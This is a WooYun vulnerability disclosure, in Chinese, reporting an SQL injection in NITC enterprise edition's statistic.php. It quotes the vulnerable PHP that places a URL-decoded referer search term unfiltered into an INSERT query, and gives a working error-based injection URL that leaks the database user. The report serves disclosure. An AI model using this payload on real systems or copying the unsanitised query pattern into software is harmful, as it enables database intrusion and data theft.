当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090952

漏洞标题:NITC企业版SQL注入#3

相关厂商:NITC

漏洞作者: 路人甲

提交时间:2015-01-13 15:27

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

在statistic.php中:

if ( trim( $_GET['pageurl'] ) != "" )
{
    $search_text = "";
    $referer = trim( $_GET['referer'] );
    $domain = substr( $referer, strpos( $referer, "//" ) + 2 );
    $domain = substr( $domain, 0, strpos( $domain, "/" ) );
    if ( strpos( $domain, "google." ) === FALSE )
    {
        $string = explode( "q=", $referer );
        $string = explode( "&", $string[1] );
        $search_text = urldecode( $string[0] );
    }
.....
.....
 $search_text = str_replace( "+", " ", $search_text );
    time( )( "insert into ".$site->table( "statistics" )." (referer,pageurl,firsttime,lasttime,timezone,ip,date_added,domain,search_text) value
    ('".trim( $_GET['referer'] )."','".trim( $_GET['pageurl'] )."','".trim( $_GET['firsttime'] )."','".trim( $_GET['lasttime'] )."','".trim( $_GET['timezone'] )."','".real_ip( )."','".date( "Y-m-d H:i:s", time( ) )."','".$domain."','".$search_text."')" );


在这里$search_text可以通过$_GET['referer']的值转变而来,然后做了一次urldecode解码操作,但解码后没有做任何过滤。 接着就带入到了最后的insert语句中,造成sql语句
POC:
statistics.php?pageurl=123&referer=//google.php?q=asd%27 or (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a))-- /

BaiduHi_2015-1-7_11-35-34.png

漏洞证明:

POC:
statistics.php?pageurl=123&referer=//google.php?q=asd%27 or (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a))-- /

BaiduHi_2015-1-7_11-35-34.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝